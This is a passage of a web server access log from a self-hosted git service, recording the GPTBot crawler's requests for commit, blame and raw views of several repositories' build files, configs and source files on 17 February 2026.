3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:15:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fApp.tsx" [Client 74.7.227.38] [Length 24731] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:15:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12968] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:15:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13885] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:15:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12752] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:15:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12761] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:15:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12929] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:15:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11291] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" -[17/Feb/2026:15:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813241] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813245] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:15:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11313] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12807] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12554] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12571] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:15:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15163] [Gzip 8.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:15:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12738] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:15:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:15:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" -[17/Feb/2026:15:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" -[17/Feb/2026:15:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" -[17/Feb/2026:15:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 